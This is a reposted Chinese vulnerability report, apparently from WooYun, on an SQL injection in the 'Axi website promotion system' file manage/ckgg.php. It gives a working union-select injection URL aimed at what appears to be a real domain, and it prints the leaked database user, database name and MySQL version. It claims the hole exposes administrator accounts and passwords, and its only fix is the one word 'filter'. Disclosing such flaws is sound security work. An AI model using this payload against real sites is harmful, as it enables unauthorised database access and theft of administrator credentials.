好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

阿西网站推广系统sql注入及修复 - 网站安全 - 自

 

要描述:可以得到管理员密码和账号!

详细说明:manage/ckgg.php,这个文件存在注入 漏洞 !大家懂得!

漏洞证明:http://1868488.com/manage/ckgg.php?id=1'and 1=2 union select 1,group_concat(user(),database(),version()),3,4,5-- and'1'='1

 

a306273835a@localhostsqla306273835a5.0.51b-community-nt

修复方案:过滤

 

作者  路人甲@乌云

查看更多关于阿西网站推广系统sql注入及修复 - 网站安全 - 自的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12746
  阅读:50次

上一篇: QCMS 1.6小漏洞及修复 - 网站安全 - 自学php

下一篇:hash注入测试 - 网站安全 - 自学php

相关资讯